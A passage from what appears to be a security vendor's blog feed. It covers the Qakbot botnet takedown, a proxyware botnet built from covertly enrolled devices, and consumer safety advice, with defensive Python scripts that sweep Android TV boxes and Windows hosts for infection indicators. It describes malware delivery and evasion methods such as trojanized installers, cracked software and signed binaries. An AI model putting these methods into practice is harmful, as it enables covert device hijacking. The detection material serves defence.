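        with open(os.path.join(root, "data", "local", "tmp", name), "w", encoding="utf-8"):
            pass
    return root

if __name__ == "__main__":
    report = sweep(build_sample_tree())
    for key, value in report.items():
        print(f"{key}: {value}")
    print("verdict:", "INFECTED" if is_infected(report) else "clean")
```

On a real box, pull at least /system, /data/local/tmp and the init scripts before running the sweep, and treat `test-keys` as a reason to distrust the firmware rather than as proof of infection on its own.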

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer, which leaves the end user unaware of their origin, any firmware modifications, and the various hands they have passed through.

Even cautious consumers who keep the original ROM and are selective about app installations face a lingering risk of malware preloaded on the device. It is advisable to opt for streaming devices from trusted brands such as Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

Android TV users should install apps only from the official app store and pay attention to the permissions an app requests. If a streaming app asks for access to your contacts or geolocation, it is best to avoid it, as it could be malware. It is also crucial not to download or install hacked apps, as they are often infected with malware of some kind.

QakBot Botnet Dismantled, But Can It Return? https://gridinsoft.com/blogs/qakbot-dismantled-return/ Thu, 07 Sep 2023 09:32:33 +0000

On Tuesday, the US authorities announced that the international law enforcement operation “Duck Hunt” had destroyed the infamous Qakbot malware platform, which is linked to Russia and is actively used by cybercriminals to commit various financial crimes. However, cybersecurity experts are not sure how fatal this operation was to the botnet, and predict that Qakbot will soon return with new tactics and tricks.

The United States and its allies dismantled the Qakbot financial fraud network

Last week, the United States, the United Kingdom, Germany, Latvia, the Netherlands, Romania, and France conducted a joint operation to dismantle the Qakbot hacker network. First appearing more than a decade ago, Qakbot typically spread through infected emails sent to potential victims under the guise of trusted messages. Cybersecurity researchers have suggested that Qakbot originated in Russia. The network has attacked organizations worldwide, from Germany to Argentina, causing significant losses. U.S. Attorney Martin Estrada emphasized that Operation “Duck Hunt”, which exposed and disrupted Qakbot, is the most extensive action in the history of the fight against botnets.

[Image: Malicious attachment that asks you to activate macros]

A colossal catch

Specialists call Operation “Duck Hunt” a significant victory in the fight against cybercrime, and for good reason. As part of the international operation, the FBI dismantled a Qakbot botnet of over 700,000 compromised computers worldwide, more than 200,000 of them in the United States. Although the authorities pushed a removal tool to the infected endpoints that unloaded Qakbot from memory, this did not neutralize other malware that may already have been present on those systems. According to investigators, between October 2021 and April 2023 Qakbot administrators received approximately $58 million in ransom paid by victims. For scale, CertiK estimates that criminals stole about $45 million worth of cryptocurrency in August of this year alone, and that users have lost $997 million to fraudulent schemes since the beginning of the year. Law enforcement seized more than $8.6 million in cryptocurrency from the Qakbot operators.

A few words about Qakbot

Qakbot is a banking Trojan that grew into a modular malware loader, often compared with TrickBot; its functionality is similar to a Swiss Army knife. It was first discovered in 2008, and since then cybercriminals have actively used it to steal data and spread other malicious programs. It was the most frequently detected malware in the first half of 2023, affecting 11% of corporate networks worldwide. The victims ranged from financial institutions on the East Coast to a critical infrastructure government contractor in the Midwest to a medical device manufacturer on the West Coast. It also served as a delivery platform for ransomware operators. Once infected, the victim’s computer became part of the giant Qakbot botnet and was used to infect even more victims. Qakbot spreads through various channels, including email, malicious links, and infected files. We have an entire article dedicated to this malware.

QakBot May Resurface Soon, Analysts Warn

Cyber threat intelligence experts warned that the takedown of Qakbot may provide only short-term relief in the fight against cybercrime. Many cybercrime service providers operate from Russia, which does not extradite its citizens, making them hard to reach. For now Qakbot appears to be on a forced sabbatical, but its operators may well rework their code to make it harder to disrupt in the future. The situation resembles that of Emotet, which was never able to regain its former position after its takedown in 2021.

Despite the obvious parallels with Emotet, it is important to note the differences between the two. Emotet and Qakbot spread differently: Qakbot used email spam only as one part of its propagation, sending from compromised email accounts. Moreover, Qakbot is backed by a team of highly professional criminals, while Emotet apparently lost its dream team in the 2021 detentions. Conti’s Team 3, now known as Black Basta, ran Qakbot operations alongside the Clop ransomware group. Team 3 has been inactive since June, but once they resurface, they could pose a potent threat.

How to protect yourself against malware?

Protecting yourself against malware is essential to safeguarding your personal information, data, and online security. Here are some fundamental steps:

  • Beware of fake websites. Be cautious when visiting websites, especially when entering sensitive information. Check that the site uses HTTPS, but do not treat the padlock as proof of legitimacy: phishing sites obtain valid certificates too, so verify the domain itself.
  • Exercise caution with email and links. Be careful when opening email attachments and clicking links, especially in messages from unknown or suspicious sources; even a message from a known contact can come from a compromised account, as Qakbot’s own spam did. Malware often spreads through phishing emails. Be skeptical of pop-up ads and unexpected download prompts, and verify the legitimacy of requests before taking action.
  • Download software from official sources. Only download software and apps from reputable sources, such as the vendor’s official website or the app store (on Android or iOS). Avoid cracked or pirated software from torrents, which is often bundled with malware.
  • Keep software updated. Windows updates may be annoying, but they are essential. Regularly update your operating system, web browsers, and all installed software. Many malware attacks exploit known vulnerabilities that updates have already patched.
  • Use strong passwords. A strong password is the first line of defense. Create strong, unique passwords for each account, and change any password that may have been exposed in a breach. Consider using a password manager to generate and store complex passwords securely.
  • Enable multi-factor authentication (MFA). Whenever possible, enable MFA for your online accounts. It is the second line of defense, stopping an intruder who has got past the first: MFA requires additional verification beyond the password.
  • Use reputable anti-malware software. We recommend installing and regularly updating reputable anti-malware software on your devices. This complements the previous points and can detect and remove malware infections.

Qakbot Botnet Hacked, Removed from Over 700,000 Machines https://gridinsoft.com/blogs/qakbot-hacked-removed-from-700k-machines/ Fri, 01 Sep 2023 11:56:52 +0000

Qakbot, a notorious botnet, has been taken down by a multinational law enforcement operation spearheaded by the FBI, Operation “Duck Hunt”. The botnet, also known as Qbot and Pinkslipbot, is considered one of the largest and longest-running botnets to date. According to conservative estimates, law enforcement officials have linked Qakbot to at least 40 ransomware attacks. These attacks targeted companies, healthcare providers, and government agencies worldwide, causing hundreds of millions of dollars in damage. In the past 18 months alone, ransom payments tied to these attacks exceeded 58 million dollars.

Qakbot has been used to deploy multiple types of malware, trojans, and highly destructive ransomware. Its affiliates and operators include Conti, ProLock, Egregor, REvil, RansomExx, MegaCortex, and, most recently, Black Basta. Its targets include U.S. critical infrastructure sectors such as the Election Infrastructure Subsector, Financial Services, Emergency Services, and Commercial Facilities, as well as organizations worldwide.

How has the Qakbot botnet been detected?

According to court documents, the FBI gained access to a computer used by one of the Qakbot administrators and found files related to the botnet’s operation: chats between the administrators and their co-conspirators, and a directory of files holding information about virtual currency wallets. By that time the botnet had infected over 700,000 computers, more than 200,000 of them in the United States.

[Image: Map of QakBot activity in the world]

While searching the same computer, the FBI found a separate file named 'payments.txt'. It contained a list of ransomware victims, along with the ransomware group involved, details of the victims’ computer systems, the dates of the attacks, and the amount of BTC paid to the Qakbot administrators in connection with each attack.

The FBI redirected Qakbot’s command-and-control traffic to servers under its control and used that channel to push an uninstaller to compromised devices worldwide, cutting them off from the botnet and preventing the deployment of any additional malicious payloads.

[Image: Qbot injection scheme]

Victims were not notified at the moment the uninstaller ran on their systems. Instead, the FBI contacted them afterwards using the IP addresses and routing information collected from their computers during the removal.

Recommendations

Organizations should implement the recommendations in the joint Cybersecurity Advisory (CSA) from CISA and the FBI. This lowers the risk of Qakbot-related activity and makes it easier to detect Qakbot-facilitated ransomware and malware infections. If you come across any related incidents or anomalous activity, report them without delay to one of the following:

  • CISA, through the agency’s online tool (cisa.gov/report) or its 24/7 Operations Center at (888) 282-0870.
  • The FBI, via a local field office.

How to prevent botnet attacks?

Using anti-malware software is an important measure to protect your computer from online threats. Cybercriminals use malware to steal private information, monitor online activity, or take over a computer and use it as part of a botnet. Dependable anti-malware software can detect and remove malware before it harms your system. To stay proactive, regularly update your anti-malware software and run full system scans. It is also crucial to keep your operating system and other software up to date, since updates often carry security patches for known vulnerabilities.

Botnet of 400,000 Devices Used as Proxy Nodes Uncovered https://gridinsoft.com/blogs/botnet-of-400000-devices-proxy/ Tue, 22 Aug 2023 13:47:44 +0000

Cybercriminals used stealthy malware to build a botnet of 400,000 proxy nodes. Although the company providing the proxy services claims that users volunteered their devices, experts believe otherwise.

A botnet of 400,000 proxy servers

Cybersecurity researchers recently discovered a botnet with more than 400,000 active proxy nodes. At first glance, the operators look like a legitimate company offering proxy services. However, the researchers found that the proxy software is installed covertly by malware, turning infected devices into proxy nodes without their owners’ knowledge.

[Image: Proxy installation process (source: AT&T)]

During installation, the proxy client sends specific parameters to the command-and-control (C2) server. It then continuously collects information about the infected system, including the list of running processes, CPU and RAM usage, and battery status, presumably to optimize performance and responsiveness. The Windows payload is not the only one: researchers also tie this service to AdLoad, a malware family that targets macOS. Cross-platform malware is relatively rare, but the choice of Go as the programming language makes it straightforward for this proxyware.

Legal on Paper, Illegal in Practice

As noted above, the operators distribute software that turns the victim’s device into a proxy server without proper consent. Yet the picture is not clear-cut. The site claims that users provide their devices voluntarily, but no notification or prompt is ever shown for the user to accept or decline. At the same time, the organization offering the residential proxy service presents itself as legitimate and the application carries a valid digital signature, which is likely why Windows antivirus tools largely ignore it.

[Image: VirusTotal analysis results (1 detection from 71 vendors)]

The macOS samples, on the other hand, are detected by most vendors. The proxy service also pays users who lend their device as a proxy node, but since the attackers run the whole enrollment, the reward goes to them rather than to the device owner. It is not surprising they did not pass up such a scheme.

Spreading methods and impact

Spreading methods are another murky area. As mentioned above, the component that turns the infected system into a proxy node ships inside the client installer: run it, and your system becomes one more node in this 400,000-device botnet. But trojanized installers are not the whole story.

The attackers know that many people disable their antivirus when downloading and installing pirated software, which effectively gives them a green light to install malware. Cracked software is downloaded from many sources, including torrent websites, file-sharing sites, and even legitimate download portals, and the malware is often hidden in the installer itself or in the cracks and keygens used to activate it. Apart from pirate sites, the other main source of this malware is advertising: unscrupulous authors of freeware sometimes allow, accidentally or intentionally, their product to be used as a delivery vehicle.

How to Avoid Sketchy Proxies & Malware?

Stay away from peer-to-peer software sharing sites. Torrent trackers are a breeding ground for malware. If you think that repack authors are selfless, you are mistaken: if you avoid paying the developer for their work, you will pay the repacker unknowingly instead, and the price is far higher, ranging from leaked data to all your information being irretrievably wiped. So avoid downloading pirated software and running executables from untrustworthy sources.

To protect your privacy, use only reputable proxy providers with trustworthy offers. Here are some tips for choosing one:

  • Read reviews from other users. This is a good way to gauge the quality of service you can expect from a particular provider.
  • Check that the provider has a good reputation, for example through independent reviews, and ask how it sources its exit nodes: a residential proxy provider whose IPs come from devices enrolled without their owners’ consent is exactly the case described above.
  • Ask about the provider’s security features. Make sure it offers encryption and authentication to protect your data.
  • Prefer paid proxy services. Free proxies are often unreliable and may log or tamper with your traffic.

Use anti-malware software as a preventive measure. Crooks use malware to steal personal information, track online activity, or take control of a computer and add it to a botnet. Reliable anti-malware software can detect and remove malware before it does harm. Regularly updating it and running full system scans helps you detect and prevent potential security breaches early. It is also essential to keep your operating system and other software up to date, as updates often include security patches for known vulnerabilities.

Mitigation

The main signs of proxyware infection are performance and internet speed degradation and frequent connections to unknown IPs or domains. To remove this sample, delete the “Digital Pulse” executable found under “%AppData%\”, the corresponding Run key under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\”, and the scheduled task named “DigitalPulseUpdateTask”. That takes care of removing this threat, but I would also recommend protecting yourself against further cases.
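The signs and artifacts listed above can be folded into a quick triage script. The following Python is an added example, not code from the article or from AT&T’s report. On a real host it would be fed the output of `netstat -ano`, `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and `schtasks /query /fo list`; here it parses constructed sample data. It flags any process holding connections to an unusually large number of distinct remote hosts, which is what a proxy exit node looks like from the inside, lists Run-key autoruns that point into AppData, and matches Run values and scheduled tasks against the Digital Pulse indicators above. The peer threshold, the sample executable path and the PID-to-behaviour mapping in the sample are assumptions made for this example.

```python
"""Proxyware triage from host artifacts: many-peer processes, AppData autoruns,
and the Digital Pulse indicators. Added example, not the article's own code.

Inputs are the text of `netstat -ano`, the Run key as {value_name: command},
and a list of scheduled task names; the ones below are constructed samples.
"""
import re
from collections import defaultdict

# Indicators named in the article (compared case- and space-insensitively).
IOC_RUN_VALUE = "digitalpulse"
IOC_TASK = "digitalpulseupdatetask"
# Assumption: a normal desktop process rarely holds connections to this many
# distinct remote hosts at once; a proxy exit node does.
PEER_THRESHOLD = 8
LOCAL_ADDRS = {"*", "0.0.0.0", "127.0.0.1", "::", "::1"}

def _norm(name):
    return re.sub(r"\s+", "", name).lower()

def parse_netstat(text):
    """Parse `netstat -ano` rows into (proto, remote_ip, remote_port, pid).
    TCP rows carry a State column, UDP rows do not."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue  # header, blank, or unexpected line
        pid = int(parts[4] if parts[0] == "TCP" else parts[3])
        ip, _, port = parts[2].rpartition(":")  # handles [v6]:port and *:*
        conns.append((parts[0], ip.strip("[]"), port, pid))
    return conns

def noisy_pids(conns, threshold=PEER_THRESHOLD):
    """PIDs talking to at least `threshold` distinct remote hosts, most talkative first."""
    peers = defaultdict(set)
    for _proto, ip, _port, pid in conns:
        if ip not in LOCAL_ADDRS:
            peers[pid].add(ip)
    hits = [(pid, len(ips)) for pid, ips in peers.items() if len(ips) >= threshold]
    return sorted(hits, key=lambda t: (-t[1], t[0]))

def appdata_autoruns(run_values):
    """Run-key values whose command lives under AppData: the usual home of
    user-level persistence, including the sample described in the article."""
    return sorted(name for name, cmd in run_values.items() if "\\appdata\\" in cmd.lower())

def known_iocs(run_values, tasks):
    """Exact (normalised) matches for the Digital Pulse Run value and task."""
    return {
        "run": sorted(n for n in run_values if _norm(n) == IOC_RUN_VALUE),
        "tasks": sorted(t for t in tasks if _norm(t) == IOC_TASK),
    }

def triage(netstat_text, run_values, tasks, threshold=PEER_THRESHOLD):
    report = {
        "noisy_pids": noisy_pids(parse_netstat(netstat_text), threshold),
        "appdata_autoruns": appdata_autoruns(run_values),
        "known_iocs": known_iocs(run_values, tasks),
    }
    report["suspicious"] = bool(report["noisy_pids"]
                                or report["known_iocs"]["run"]
                                or report["known_iocs"]["tasks"])
    return report

# ---- constructed sample data (not captured from a real host) ----
def sample_netstat():
    rows = ["  Proto  Local Address          Foreign Address        State           PID"]
    # PID 4120: one process fanning out to twelve unrelated hosts on 80/443
    for i in range(12):
        rows.append(f"  TCP    10.0.0.5:{50000 + i}   198.51.100.{i + 1}:{443 if i % 2 else 80}"
                    f"   ESTABLISHED   4120")
    # PID 880: a browser-like process with a handful of peers plus loopback
    for i in range(3):
        rows.append(f"  TCP    10.0.0.5:{51000 + i}   203.0.113.{i + 1}:443   ESTABLISHED   880")
    rows.append("  TCP    127.0.0.1:49152        127.0.0.1:49153        ESTABLISHED     880")
    rows.append("  UDP    0.0.0.0:5353           *:*                                    1204")
    return "\n".join(rows)

SAMPLE_RUN = {
    "OneDrive": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background",
    # constructed path; the article only says the executable sits under %AppData%\
    "Digital Pulse": r"C:\Users\alice\AppData\Roaming\Digital Pulse\proxy-client.exe",
}
SAMPLE_TASKS = ["MicrosoftEdgeUpdateTaskMachineUA", "DigitalPulseUpdateTask"]

if __name__ == "__main__":
    for key, value in triage(sample_netstat(), SAMPLE_RUN, SAMPLE_TASKS).items():
        print(f"{key}: {value}")
```

The peer-count heuristic is deliberately coarse: browsers and update agents can exceed it briefly, so use it to pick which PID to look at first and confirm with the executable path and signer before killing anything.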
